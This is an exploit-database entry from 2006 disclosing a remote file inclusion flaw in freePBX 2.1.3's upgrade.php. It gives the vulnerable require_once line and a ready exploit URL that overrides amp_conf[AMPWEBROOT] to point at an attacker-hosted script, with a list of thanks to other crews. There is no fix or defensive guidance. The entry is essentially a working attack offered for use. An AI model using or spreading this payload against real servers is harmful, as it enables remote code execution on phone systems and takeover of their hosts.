freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability
# Published : 2006-10-28
# Author : xoron
# Previous Title : PHPMyDesk 1.0beta (viewticket.php) Local Include Exploit
# Next Title : mp3SDS 3.0 (Core/core.inc.php) Remote File Include Vulnerability

Script: freePBX
Version: v2.1.3
Script Download: http://puzzle.dl.sourceforge.net/sourceforge/amportal/freepbx-2.1.3.tgz
Code: require_once($amp_conf["AMPWEBROOT"] . "/admin/functions.inc.php");
Exploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?
Found: Cyber-Security
Thanks: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

# www.Syue.com [2006-10-28]